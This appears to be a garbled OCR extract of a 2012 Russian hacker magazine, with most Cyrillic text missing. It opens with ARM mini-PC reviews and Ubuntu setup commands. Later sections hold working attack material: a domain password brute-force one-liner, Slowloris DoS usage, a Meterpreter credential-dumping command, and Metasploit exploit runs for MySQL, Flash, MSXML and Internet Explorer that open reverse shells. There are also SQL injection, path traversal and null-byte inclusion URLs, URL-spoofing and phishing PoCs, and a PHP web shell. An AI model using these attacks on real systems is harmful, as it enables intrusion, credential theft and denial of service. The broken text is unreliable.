Linux, OMAP4. , Ubuntu.
Linux (
), SD-.
Ubuntu OMAP4: cdimage.ubuntu.com/releases/11.10/release/
ubuntu-11.10-preinstalled-desktop-armel+omap4.img.gz.
SD-. SD-,
:
$ df -h
PandaBoard ,
.
Texas Instruments (). ,
, ,
. PandaBoard
,
. ,
PandaBoard -,

.
PandaBoard TI OMAP
4460 ( PandaBoard ES, PandaBoard 4430) ARM Cortex-A9.
1,2 , 1 ,
SD-.
PowerVR SGX540. OpenGL ES 2.0,
OpenGL ES 1.1, OpenVG 1.1 EGL 1.3.
? , ,
WiLinkTM 6.0,
Wi-Fi (802.11 b/g/n) Bluetooth,
Ethernet 10/100, RTC ( ), HDMI DVI-D, USB 2.0,
. 82
, 114,3101,6 .

RS-232 ( ,
,
- , )
. , BeadaFrame
7" LCD (BeadaFrame 7" LCD display kit),
TFT- 7 800480, ,
(RTC
time keeper) .

- ,

Linux Android.
182$
goo.gl/8fWYF
- :
Filesystem
/dev/sda5
none
none
none
none
/dev/sdb2
Size
100G
995M
1002M
1002M
1002M
16G
Used
8.0G
700K
308K
104K
0
0G
Avail
Use% Mounted on
92G
8% /
995M
1% /dev
1001M
1% /dev/shm
1002M
1% /var/run
1002M
0% /var/lock
16G
0% /media/ 097afede571b-32c4-8612-3364f0655f52
, SD- /dev/sdb2. :
$ sudo umount /dev/sdb2
SD-:
$ gunzip -c ubuntu-11.10-preinstalled-server-armel+omap4.img.gz \
| sudo dd bs=4M of=/dev/sdb
$ sync
PandaBoard COM-
. , USB2COM (USB
to Serial). PandaBoard ( ):
$ TERM=vt100 minicom -s
minicom /dev/ttyUSB0,
USB2COM. ,
PandaBoard, $ dmesg | grep tty.
,
, Ubuntu .
Ubuntu .
PandaBoard /etc/apt/sources.list
sudo vim /etc/apt/sources.list
,
Universe Multiverse. :
$
$
$
$
sudo
sudo
sudo
sudo
apt-get install python-software-properties

add-apt-repository ppa:tiomap-dev/release
apt-get update
apt-get install ubuntu-omap4-extras
PandaBoard:
$ sudo reboot
08 /163/ 2012
041
PC ZONE
TRIM-SLICE
Trim-Slice
,
CompuLab. -.

Trim-Slice
. (9,5131,5 ),
, .

NVIDIA Tegra 2. ARM-
1 1,2 .
Trim-Slice : SSD SATA 32 (-,
SSD-), SD- SD- , 1 DDR2-800,
HDMI DVI, 5.1, 4 USB- 2.0,
Ethernet- 10/100/1000, Wi-Fi 80.211n, RS-232.
,
( USB-, RS-232, Wi-Fi Ethernet), ( SSD SD- ),
. USB-.
, Trim-Slice , .

Ubuntu.
ALLWINNER A10
ZERO DEVICES Z802
74$
, .
- .
-
AlLWinner A10 ZERO Devices Z802
, ,
.
ZERO Devices.
2
. .
ZERO Devices Z802: tinyurl.com/7gjzj6y.
AllWinner A10 , Raspberry Pi:

ARM Cortex-A8 1,5 . 512 ,
Mali-400, HDMI-, USB microUSB, SD- ( SD- 32 ), Wi-Fi 802.11 b/g.
AllWinner ,
Full HD. .
- Android Ice Cream

Sandwich. ARM- , Linux.
338$
trimslice.com
- ARM,
, . - ANDROID
LINUX.
042
Amlogic AML8726 ARM Cortex A9 (65 ),

800 , L2 128 , Mali-400 GPU
250 M, 1080P.
Rockchip RK2918 ARM Cortex A8 (55 ),
1,2 , 1 , L2
512 , GC800 GPU 600 M,
1080P.
Allwinner A10 ARM Cortex A8 (55 ), 1,5 ( ~11,2 ), L2
512 , Mali-400 GPU 300 M,
2160P.
Amlogic, Cortex A9.
( 800 ) .
08 /163/ 2012
- -
Raspberry Pi
Cotton Candy
CuBox
PandaBoard
Trim-Slice
AllWinner A10
Raspberry Pi
Foundation,
FXI Technologies,
SolidRun Ltd.,
Texas Instruments,
CompuLab,
AllWinner Technology
Co. Ltd.,
35 $
199 $
99
182 $
213338 $
74 $
Debian, Ubuntu,
Fedora
Android 4.0 Ice Cream

Sandwich
Ubuntu,
Android
, Linux, Android,
QNZ, RiscOS
Ubuntu
Android 4.0 Ice Cream

Sandwich
Broadcom
BCM2835, 700
Samsung Exynos 4210,

1,2
Marvell Armada 510

ARMv7, 800
TI OMAP 4460 ARM

Cortex-A9, 1,2
NVIDIA Tegra 2, 1,2
ARM Cortex-A8, 1,5
256
1 DRAM
1 DDR3 800
1 DDR2
1 DDR2-800
512 DDR2
Mali-400 MP
Vivante GC600 Marvell

vMeta HD Video
Decoder
PowerVR SGX540
NVIDIA GeForce GPU
Mali-400
USB 2.0 x 2*
HDMI x 1
RCA x 1
USB 2.0 x 1
microUSB x 1
HDMI x 1
HDMI x 1
S/PDIF x 1
USB 2.0 x 1
eSATA x 1
irDA x 1
microUSB x 1
HDMI x 1
DVI x 1
Audio In/Out
USB x 3
RS 232
HDMI x 1
DVI x 1
USB 2.0 x 4
S/PDIF 5.1 x 1
Stereo line-out / line-in
HDMI x 1
USB 2.0 x 1
microUSB x 1
SATA x 1
SD, MMC SD
microSD
microSD, eSATA
SD, MMC SD
SD, SSD, SATA
Micro TF 2-32GB
Wi-Fi 802.11 b/g/n

Bluetooth
100baseT Ethernet
1000baseT Ethernet
Bluetooth
Wi-Fi 80.211n
RS-232
100baseT Ethernet
Wi-Fi 802.11 b/g
26
2,757,8
Ethernet
Wi-Fi 802.11b/g/n
Bluetooth
1000baseT Ethernet

* 2 B, A
08 /163/ 2012
043
/ EASY HACK
GreenDog , Digital Security (twitter.com/antyurin)
EASY
HACK
INFO

.
SSL
SSL ,
.
, . ,
.
.
Easy Hack, ,
SSL ( HTTPS), .
, SSL - ,
, . SSL
2.0. ,
man-in-the-middle.
/ ( , ).
, ,
.
- SSL v2.0. , , BEAST-. ,
RC4.
, :).
,
MITM-,
. SSL, , (),
- .
. -,
,
. -,
,
.
:).
, - , , .
, , . , Java
044
SSL, . ,
, . !
FTPS, POP3S. , ,
, - ,
SSL Chrome
08 /163/ 2012
.
.
.
?.
, . Gremwell (www.gremwell.com)
sslcaudit (goo.gl/6vwuC),
SSL-.
,
.
, , . .
:
git clone -b release_1_0 https://github.com/grwl/sslcaudit.git
sudo apt-get install python-m2crypto
Python M2Crypto (goo.gl/nCw8W).

:
- ,
HTTPS, https://ssltest.
offenseindepth.com. .
( sslcaudit), SSL-
Wireshark. ,
ncat, ,
SSL.
./sslcaudit
ncat -l -p 4343 --ssl
8443.
, . goo.gl/EKSWl.

SSL v2.0.
, - .
, .
, , - ,
: - , . , , .
,
. ,
.
,
, . , , ,
-
. : _.
,
. ,
,
.
, , SMB- PDF.

.
, NULL session, Cain, , SID (. ),
.
, . .
: ,
. , (, ):
net accounts /domain
, , .
08 /163/ 2012
.
, , - :).
. -

.
, . commandlinekunfu LaNMaSteR53:
@FOR /F %n in (names.txt) DO @FOR /F %p in (passwords.txt)
DO @net use \\DC01 /user:mydomain\%n %p 1>NUL 2>&1 &&
@echo [*] %n:%p && @net use /delete \\DC01\IPC$ > NUL
IPC$ .
, .
. LaNMaSteR53
. , - ,
1000 , ,
.
045
/ EASY HACK
. , ,
Cain
.
LaNMaSteR53
, ,
. :
Login1:Password1
Login1:Password2
Login1:Password3
Login2:Password4
Login2:Password5
Login2:Password6
LaNMaSteR
. , 2000 .
-,
:
cmd /v:on /c "set /a usercount=0 >NUL & for /F %u in
(users.txt) do @set
/a passcount=0 >NUL & set /a lpass=!usercount!*4 >NUL &
set /a upass=!usercount!*4+4
>NUL & @(for /F %p in (passwords.txt) do @(IF !passcount!
GEQ !lpass! (IF !passcount!
LSS !upass! (@net use \\DC01 /user:mydomain\%u %p 1>NUL
SID
2>&1 && @echo This works

%u/%p && @net use /delete \\DC01\IPC$ > NUL))) & set /a
passcount=!passcount!+1 >NUL)
& set /a usercount=!usercount!+1 >NUL"
!
login: Alphanetworks
password: wrgg19_c_dlwbr_dir300
DNS
: - !
DNS-
SQL-.
sqlmap.
SQL-
OWASP. - ,
, c Sony
Anonymous , ,
? :)
, SQL- ,

. ,
, ... , , , -
.
DNS tunneling
, , . ,
, ,

, - ,
.
, - , DNS-,
. , ,
( ) DNS-.
,
, DNS-. . , , , DMZ
046
SQL-, DNS
. ( ?)
DNS-. , ,
( , DNS?). ,
DMZ ,
DNS-. , ,
DNS-,
08 /163/ 2012
. , DNS,
, -
.
, .
- ( ) .
DNS-,
(
).
DNS-
.
,
. ,
:).
, DNS . Corelan - download&execute
DNS, Metasploit. ,
Meterpreter
. - -
DNS
SQL-. !
, DNS- , blind,
.
sqlmap
, , sqlmap (goo.gl/xl4Hv),
.
,
. - ,
.
DoS, , : , . -
, (, DEP
ASLR) remote code execution
DoS. --, -
. DoS/DDoS-.
. DoS = = .
, DoS -
, , -
. , , ,
100 000 , .
, , , HTTP.
, - , . :). HTTP-
,
.
Slowloris (goo.gl/tbe81). (Robert RSnake Hansen) 2009 ,
. HTTP- -,
, , . ,
- HTTP- ,
. , - ,
-. , ,
. ,
. , .
08 /163/ 2012
-,
HTTP-.
, .
, , , -
Apache.
Slowloris . -, ,
. -, , , .
, , -
, .
, - .
, Slowloris ,
Slowloris defcon-russia.ru
047
/ EASY HACK
. , . - -,
, RDP
, , RDP :).
, . Slowloris,
Perl CPAN, .
, , -
Windows Slowloris .
BACKTRACK 5
. Offensive Security
BackTrack. . BackTrack
,
METERPRETER
Easy Hack - ,
-, . , Metasploit.
-- Meterpreter.
, :).
, Meterpreter
exe.
, !
,
- ,
, meterpreter . !
- ,
(- SMBRelay, Pass the Hash),
.
, , ,
:).
-, Meterpreter , ( incognito) ,
,
. , ,
NTLM- ,
- . WCE.
, , mimikatz.
. , ,
Meterpreter.
,
exe - .
-. .
(
048
1. Perl:
perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'
2. :
perl slowloris.pl -dns victim.com
, ,
GET ( ), HEAD,
POST, HTTPS.
-, ,
, .
Ubuntu, ,
, apt-get.
BackTrack
5 R2 goo.gl/1Jlwa. .
meterpreter). , ,
?
meterpreter forensic. .
. ,
.
meterpreter .
.
, WCE,
meterpreter-:
execute -H -m -d calc.exe -f wce.exe -a "-o creds.txt"
execute , -;
-H ;
-m , ;
-d dummy-exe,
;
-f exe -,
;
-a "-o creds.txt" .
,
. ,
, .
Meterpreter, , , dummy-exe.
,
exe .
:).
. ,
dummy-.
. !
08 /163/ 2012
(ivinside.blogspot.com)

.
.
MySQL/MariaDB
CVSSV2
7.5
(AV:N/AC:L/AU:N/C:P/I:P/A:P))
BRIEF
MariaDB
CVE-2012-2122 MySQL
MariaDB. ,

( root,
) .
EXPLOIT
,
MariaDB/MySQL. ,
(SHA ),
, .
,
.
memcmp() :
typedef char my_bool;
...
my_bool check(...) {
return memcmp(...);
}
, check() char,
memcmp() int. int char,
, int. ,
memcmp() , , 0x100 -
050
, char . ,
. memcmp()
, , .
Accuvant Labs (pastie.org/4064638), memcmp()
.
,
MySQL/MariaDB.

1/256,
:
$ for i in 'seq 1 1000'; do mysql -u root --password=bad \
-h 127.0.0.1 2>/dev/null; done

MySQL, .
Pwnie Express
Metasploit,
.
:
$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) >
set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding
with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication
after 205 attempts
08 /163/ 2012
[+] 127.0.0.1:3306 Successful exploited the authentication

bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot:
root:*C8998584D8AA12421F29BB41132A288CD6829A6D
debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved:
20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
handling. This exception may be expected and handled.
0:000> u eip
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c mov
eax,dword ptr [edx+2Ch]
104b1b30 53
push
ebx
104b1b31 ffd0
call
eax
TARGETS
MariaDB MySQL 5.1.61, 5.2.11, 5.3.5, 5.5.22 : Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04),
,
Metasploit, Internet
Explorer 6/7/8 Windows XP SP3:
eax=02dbac01 ebx=0013e2e4 ecx=02dbac10

edx=44444444 esi=02dbac11 edi=00000000
eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0
nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c mov
eax,dword ptr [edx+2Ch]
ds:0023:44444470=????????
openSUSE 12.1 64-bit, Debian Unstable 64-bit, Fedora 16, Arch Linux.
SOLUTION
. ,
MySQL .
my.cnf [mysqld] bind-address 127.0.0.1,
.
Adobe
Flash Player
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:/I:/A:)
BRIEF
Adobe Flash Player, ,
. .
Word Flash (SWF) .
.
EXPLOIT
Metasploit , . .
SWFs spray,

.
, AMF (Action Message Format) RTMP (Real Time Messaging
Protocol). RTMP
,
- .
(, )
- , RTMP-
. Flash Media Server,
systemMemoryCall(),
.
, PCAP-,
RTMP-.
,
systemMemoryCall(). , Abode
Flash Player :
(348.540): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception
08 /163/ 2012
msf
msf
[*]
[*]
[*]
[*]
[*]
msf
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[+]
[+]
> use exploit/windows/browser/adobe_flash_rtmp

exploit(adobe_flash_rtmp) > exploit
Exploit running as background job.
Started reverse handler on 192.168.1.157:4444
Using URL: http://0.0.0.0:8080/Sgs7eu3zjBo0
Local IP: http://192.168.1.157:8080/Sgs7eu3zjBo0
Server started.
exploit(adobe_flash_rtmp) >
192.168.1.158
adobe_flash_rtmp - Client requesting:
/Sgs7eu3zjBo0
192.168.1.158
adobe_flash_rtmp - Using msvcrt ROP
192.168.1.158
adobe_flash_rtmp - Sending html
192.168.1.158
adobe_flash_rtmp - Client requesting:
/Sgs7eu3zjBo0/BnKXAzRw.swf
192.168.1.158
adobe_flash_rtmp - Sending Exploit SWF
192.168.1.158
adobe_flash_rtmp - Connected to RTMP
Sending stage (752128 bytes) to 192.168.1.158
Meterpreter session 1 opened (192.168.1.157:4444 ->
192.168.1.158:1840) at 2012-06-22 11:11:16 +0200
Session ID 1 (192.168.1.157:4444 -> 192.168.1.158:
1840) processing InitialAutoRunScript 'migrate -f'
Current server process: iexplore.exe (2284)
Spawning notepad.exe process to migrate to
Migrating to 3904
Successfully migrated to process
TARGETS
Adobe Flash Player 11.2.202.233
Windows, Macintosh Linux, Adobe Flash Player 11.1.115.7
Android 4.x Adobe Flash Player 11.1.111.8 Android 3.x 2.x.
SOLUTION
Adobe Flash Player .
Microsoft
XML Core Services
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:/I:/A:)
BRIEF

, Internet Explorer
051
/
Microsoft Office.
IM, , .
MSXML
,
.
EXPLOIT
get_definition() XML Node. ,
Internet Explorer, :
<object
classid="clsid:6D90f11-9c73-11d3-b32e-00C04f990bb4"
id="xx">
</object>
<script>
document.getElementById("xx").object.definition(0);
</script>
,
,
_dispatchImpl :: InvokeHelper().

Metasploit, :
msf > use exploit/windows/browser/msxml_get_definition_code_
exec
msf exploit(msxml_get_definition_code_exec) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(msxml_get_definition_code_exec) > set lhost
10.0.1.3
lhost => 10.0.1.3
msf exploit(msxml_get_definition_code_exec) > exploit
[*] Exploit running as background job.
[*]
[*]
msf
[*]
[*]
[*]
[*]
[*]
[*]
[*]
Started reverse handler on 10.0.1.3:4444

Using URL: http://0.0.0.0:8080/xtQdbEC7QDIb
exploit(msxml_get_definition_code_exec) >
Local IP: http://10.0.1.3:8080/xtQdbEC7QDIb
Server started.
10.0.1.79
msxml_get_definition_code_exec - Using
msvcrt ROP
10.0.1.79
msxml_get_definition_code_exec 10.0.1.79:1564 - Sending html
Sending stage (752128 bytes) to 10.0.1.79
Meterpreter session 2 opened (10.0.1.3:4444 ->
10.0.1.79:1565) at 2012-06-18 14:07:38 -0500
Session ID 2 (10.0.1.3:4444 -> 10.0.1.79:1565)
processing InitialAutoRunScript 'migrate -f'
, memcmp()
[*]
[*]
[+]
[+]
Current server process: iexplore.exe (2856)

Spawning notepad.exe process to migrate to
Migrating to 2356
Successfully migrated to process
TARGETS
Metasploit IE6/7/8/9, Windows XP, Vista
Windows 7 SP1.
SOLUTION
.

ActiveX MSXML
Internet Explorer Microsoft Office.
, Microsoft Microsoft
Fix it 50897.
Internet
Explorer
CVSSV2
10.0
(AV:N/AC:L/Au:N/C:/I:/A:)
BRIEF
Microsoft Internet Explorer
,
.
Same ID Property Remote Code Execution Vulnerability.
Dark Son Yichong Lin.
Metasploit Juan Vazquez.
CVE-2012-1875.
IE
052
EXPLOIT
- (ROP) DEP ASLR.

08 /163/ 2012
Java, msvcr71.dll
ASLR, , Internet Explorer .

Metasploit.
( ):
msf > use exploit/windows/browser/ms12_037_same_id
msf exploit(ms12_037_same_id) > set payload windows/
meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms12_037_same_id) > set lhost 10.0.1.3
lhost => 10.0.1.3
msf exploit(ms12_037_same_id) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.1.3:4444
[*] Using URL: http://0.0.0.0:8080/gTHJEKBboMi
[*] Local IP: http://10.0.1.3:8080/gTHJEKBboMi
[*] Server started.
msf exploit(ms12_037_same_id) >
[*] 10.0.1.79
ms12_037_same_id - Client
requesting: /gTHJEKBboMi
[*] 10.0.1.79
ms12_037_same_id - Using msvcrt ROP
[*] 10.0.1.79
ms12_037_same_id - Sending html
[*] Sending stage (752128 bytes) to 10.0.1.79
[*] Meterpreter session 1 opened (10.0.1.3:4444 ->
10.0.1.79:1685) at 2012-06-18 13:42:49 -0500
[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.79:1685)
processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3916)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1680
[+] Successfully migrated to process
TARGETS
Metasploit Internet Explorer 8 Windows XP
SP3 7 SP1, , in the wild,
Windows, Windows Vista
Windows 7.
, RTMP-
SOLUTION
Microsoft.
iBoutique
eCommerce v4.0
CVSSV2
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Vulnerability Laboratory Research , -
iBoutique CMS v4.0.
EXPLOIT
1. iBoutique v4.0 SQL-, SQL-
.
.
OrderNumber index.
php, :
SQL_ERROR
select * from websiteadmin_orders WHERE OrderNumber=
254' AND UserName='hack'
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND
UserName='hack' at line 1
Details for order #254'
:
http://127.0.0.1:1338/iboutique/index.php?page=en_Orders
&OrderNumber=258'+/*!Union*/+/*!SelEct*/+1,2,3,4,version(
),6,7,8,9,10--%202. ,
.
, my area my profile edit profile (first name, last name, email, state,
address ) HTML-, <iframe
src=www.vuln-lab.com onload=alert("VL")/>.
,
.
TARGETS
iBoutique eCommerce v4.0 , , .
SOLUTION
. z
ROP, CVE-2012-1875
08 /163/ 2012
053
Sanjar Satsura (satsura@r00tw0rm.com, twitter.com/sanjar_satsura)
INTRO
,
.
: ,
.
. , ,
. , spoof-
,
, . , :
(post-exploitation).

, ,
, ,
-
. , -,
, , ,
-,
. ,
.
054

spoofing
, .
,
old school spoofing
.
, , .
, , ,
, . , ,
,
(
). ,
. , DNS: , , (][_#5_2012)

DNS-
08 /163/ 2012
UDP (, TCP/IP, , ) .

(local) (net).
.
,
,
,
. , , . , ,
. .
1. Spoofing TCP/IP & UDP . - TCP
UDP :
IP spoofing IP- source IP-.
, , ,
;
ARP spoofing Ethernet-,
. ARP;
DNS Cache Poisoning DNS- ;
NetBIOS/NBNS spoofing
Microsoft.
2. Referrer spoofing .
3. Poisoning of file-sharing networks
.
4. Caller ID spoofing VoIP
5. E-mail address spoofing e-mail .
6. GPS Spoofing
GPS-.
7. Voice Mail spoofing
.
8. SMS spoofing ,
SMS-.

.
.
,
,
. , .

EXTENSION SPOOFING
,
Zhitao
Zhou. 0x202E (RLO) ,

Windows (explorer.exe).
:
Super music uploaded by 3pm.SCR
3pm.SCR , , (
. . ). 3pm.
SRC 0x202E (. . 1),
Windows :
Super music uploaded by RCS.mp3

(Restorator, Resource Hacker).
,
, . ,
,
. C#,
, 0x202E:
Public Sub U_202E(fi le As String, extension As String)
Dim d As Integer = file.Length - 4
Dim u As Char = ChrW(823)
Dim t As Char() = extension.ToCharArray()
Array.Reverse(t)
Dim dest As String = fi le.Substring(0, d) & u &
New String(t) & fi le.Substring(d)
System.IO.File.Move(file, dest)
End Sub
FILE NAME SPOOFING

Yosuke Hasegawa Security-Momiji.
(ZERO WIDTH
Characters),
(. . 2). :
U+200B (ZERO WIDTH SPACE)
IDN-
IDN- 2001
. , , 2005
ShmooCon.
pypal.com (xn--pypal-4ve.com Punycode),
. Slashdot.org
, ,
.
UTF
08 /163/ 2012
055
U+200C (ZERO WIDTH NON-JOINER)

U+200D (ZERO WIDTH JOINER)
U+FEFF (ZERO WIDTH NO-BREAK SPACE)
U+202A (LEFT-TO-RIGHT EMBEDDING)
UTF
.
.
, . , TrojanDropper:Win32/Vundo.L (
vk.com, vkontakte.ru, *odnoklassniki.ru)
.
%SystemRoot%\system32\drivers\etc\hosts
- hosts UTF- (0043E), hosts
:
92.38.66.111
92.38.66.111
92.38.66.111
odnoklassniki.ru
vk.com
vkontakte.ru
? !
RLO Charmap
-
STATUS BAR / LINK SPOOF

(<a href=''>). , ,
, .
JavaScript- . , iamjuza,
PoC
,
. , ,

. Proof-of-Concept
1337day.com. :
this.href=": <a href="http://www.google.com/"

onclick="this.href='http://xakep.ru'">Click me!</a><br />
location.reload='': <a href="http://www.google.
com/" onclick="location.reload='http://www.xakep.ru';
return false;">Click me!</a><br />
location.replace(''): <a href="http://www.google.
com/" onclick="location.replace('http://www.xakep.ru');
location.assign(''): <a href="http://www.google.
com/" onclick="location.assign('http://www.xakep.ru');
window.location.assign(''): <a href="http://www.
google.com/" onclick="window.location.assign('http://
www.xakep.ru'); return false;">Click me!</a><br />

window.location.replace(''): <a href="
http://www.google.com/" onclick="window.location.
replace('http://www.xakep.ru'); return false;">
Click me!</a><br />
window.location.href='': <a href="http://www.
google.com/" onclick="window.location.href=
'http://xakep.ru'; return false;">Click me!</a><br />
HTML- (www.google.com) ][ (www.

xakep.ru) ,
JavaScript- onclick=''.
URL BAR SPOOFING

,
.
CVE-2011-1452,
Google Chrome 11.0.696.57:
<html><head>
<meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1"></head>
<body>
<a href="javascript:spoof();">Click Me</a>
<script>
var a=null;
function spoof() {
a = window.open('./spoofing.php')
WARNING
FLAMER MICROSOFT
Microsoft Security Advisory (2718704) Unauthorized Digital
Certificates Could Allow Spoofing.

Flamer: -
,
- .
056

, MITM-,

.
- Security Advisory #2718704
High.

.
,

,

.
08 /163/ 2012
hosts
window.setTimeout("a.history.back()", 4500);
window.setTimeout("a.location.href='./spoofing.php'", 5000);
}
</script>
</body></html>
Click Me spoof(),
:
(spoofing.php) a;
4500 (4,5 ) ( window.
setTimeout) ,
a.history.back(),
;
5000
location spoofing.php, .
URL .
CVE-2010-4045 (Opera <= 10.62):
057
<html><head>
<meta http-equiv="Content-Type"
08 /163/ 2012
057

content="text/html; charset=ISO-8859-1">
</head><body>
<h1>Proof of Concept - OPERA High Location Bar Spoofing</h1>
<br><img onclick="location.reload();setTimeout(stop();
location.href='http://google.com', 0500)" src="click.png">
</body></html>
,
(<img>), (location.reload()),
.
0-day Safari iOS 5.1:
<body>
<fieldset>
<legend>Some payment/bank website included here.
</legend>
<ol>
<li>start poc<xmp>click the button to run the poc.
</xmp><button id="one">Demo</button></li>
</ol>
</fieldset>
<script type="text/javascript">
document.getElementById('one').onclick = function()
{
myWindow=window.open('http://www.apple.com',
'eintitel','width=200,height=100,location=yes');
myWindow.document.write("<html><head></head>
<body><strong>This is fishing page.</strong>
<br><br><iframe src=\"http://www.apple.com\");>
</iframe></scri+pt></body></html>");
myWindow.focus();
return false;
}
</script>
<br><br><br>
<iframe id="ifR1" name="ifR1"width="100px"
height="50px" src="http://www.apple.com"></iframe>
</body>
<p>Can you view my source from Chrome?</p>

</body></html>
source.html[%20%2E]
You can, but not that easily...

RLO (. . 4).
source.html
source.html%20%2E.
, ,
. ,
, .
IDN CLONES ,

,
DNS, IDN
(Internationalized Domain Names )
. -
:
1. , .
( l 1, O 0), (rn m, cl d).
2. -, .
3. ( ,
, Twitter, iframe, ).
4. :).
SOURCE CODE SPOOFING

UTF-8 0x202E (RLO). Virginia Tech (John Kurlak).
JavaScript History.replaceState(),

. Proof-of-Concept (source.html):
, , -
: .
IDN- 2005
, , IDN. , .org

. .
IDN
. xn
,
. ,
IDN.
IDN-
.
punycode- IDN-,
. , , ;-). (src/exploits/link_spoof.py).
<html><head><title>Source</title>
<meta charset="UTF-8">
<script type="text/javascript">
history.replaceState(null, null,
'source.html' + String.fromCharCode(8237));
</script></head><body>
,
. , .
.
? :). z
Demo
myWindow ,
apple.com 200100,
Safari . myWindow HTML (JavaScript/VB/etc)
document.write().
Safari myWindow.

, ,
;-).
058
08 /163/ 2012
, Positive Technologies (sscherbel@ptsecurity.ru)

PHP
PHP

PHP-

.

,
.
?
PHP.
,
.
PHP , , .
.
:
1. PHP- ( ,
C-);
2. C- .
PHP Roadsend PHP, Phalanger,
Quercus on Resin, HipHop for PHP. ,
.
08 /163/ 2012
PHP
Roadsend PHP
Roadsend PHP , , -,
MicroServer. PHP- . -
- .
-
Apache, lighttpd, nginx,
- CGI
FastCGI.
059
.1. /etc/passwd
Phalanger
Phalanger , ,
PHP, ,
. PHP-
.NET-,
-,
PHP. Phalanger -
IIS, , PHP.
Quercus on Resin
- Resin.
Resin -
Java, PHP,
Quercus. Resin Professional
Open Source. Professional PHP-
- Java, Open Source PHP-
.
HipHop for PHP

HipHop, Facebook. HipHop
PHP- C++, ,
g++, . ,
, HipHop, 30 .
-:
,
. ,
Roadsend PHP,
- CGI FastCGI. , ,
. :
1. (Local File Inclusion)
,
;
2. , ,
.

,
,
PHP. , ?

?
060
.2. 500 Quercus
,
. ,
:

- ,
-;
,
HTTP Parameter Pollution HTTP Parameter Contamination,
;
;
, PHP.

Roadsend PHP, , MicroServer. ,
Path Traversal. .
Path Traversal Roadsend PHP
http://host/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc
%2fpasswd
,
, URL-.
(. . 1). :
Path Traversal
http://host//etc/passwd
Roadsend PHP ,
, , .
.

, - : -

08 /163/ 2012
PHP
.5.
, -
. HTTP Parameter
Contamination.
,
client-side . . 1 PHP
LAMP. , PHP.
Phalanger Quercus. , ,
500 (. fingerprint . 2).
,
null-byte,
(. ), ,
.
, Local File Inclusion
foreach($_GET["language"]
as $langDir => $langFile)
{
include($langDir."/".$langFile.".php");
}
, . null-byte , .
/etc/passwd
http://host/index.php?language["/etc/passwd%00"]=1
.4. $_SERVER["DOCUMENT_ROOT"]

-. PHP register_globals,
5.4.0 . ,
PHP , . Quercus
register_globals (
), POST ,
. , ,
POST, _SERVER. . 3
_SERVER["REMOTE_
ADDR"], , ,
IP-.

$_SERVER["DOCUMENT_ROOT"], , Local File Inclusion (. . 4).
, PHP (.
) ,
.
$_SERVER["DOCUMENT_ROOT"]
<?php
include($_SERVER["DOCUMENT_ROOT"]."header.php");
?>
advisory: bit.ly/MFeJYu.
.
, _SESSION :
.
LAMP
test.php?=
Array
(
)
test.php?[]=
Array
(
)
Array
(
[a] => Array
test.php?a[][= (
[0] =>
)
)
.3. _SERVER
08 /163/ 2012
IIS 7.5 +
Phalanger 3.0
Array
(
[] =>
)
Array
(
[[]] =>
)
Error 500
HipHop
Array
(
)
Array
(
)
Array
(
[a] => Array
(
[0] =>
)
)
Quercus on
Resin <= 4.0.26
Array
(
[] =>
)
Array
(
[0] =>
)
Error 500
1.
061

0 ,
PHP. ,
.

, PHP . , disable_functions,
( , , shell-),
open_basedir,
. .
disable_functions
shell-
disable_functions: system, exec, shell_exec, passthru,
popen, proc_open, pcntl_exec
.6 Null-byte
, , _SESSION, .

PHP , (

false). ,
PHP (bit.ly/LQsvHh).
. PHP
. , ,
.

// script 1
<?php
$xArray = array(TRUE, FALSE, 1, 0, -1, "1", "0", "-1",
NULL, array(), "php", "");
foreach($xArray as $x) {
if($x == array()) { echo("TRUE"); }
else { echo("FALSE"); }
echo("<br>");
}
?>
// script 2
<?php
$xArray = array(TRUE, FALSE, 1, 0, -1, "1", "0", "-1",
NULL, array(), "php", "");
foreach($xArray as $x) {
if(array() == $x) { echo("TRUE"); }
else {
echo("FALSE"); }
echo("<br>");
}
?>

, , , . , . , .
3, Quercus
,
PHP. , array()
062
, shell- .NET, . .
shell- .NET
<?php
$process = new Diagnostics\Process();
$process->StartInfo->FileName = "cmd.exe";
$process->StartInfo->WorkingDirectory = "C:\\";
$process->StartInfo->Arguments = "/c ".$_GET["cmd"];
$process->Start();
$process->WaitForExit();
?>
OLD SCHOOL

Roadsend PHP Quercus
HTML-,

(. . 5). , , 2012
, 2002-?
Path Traversal
Quercus, 3- - Resin,
Path Traversal .
. -
LAMP
Array
test.php?a%=1 ([a%] => 1
)
Array
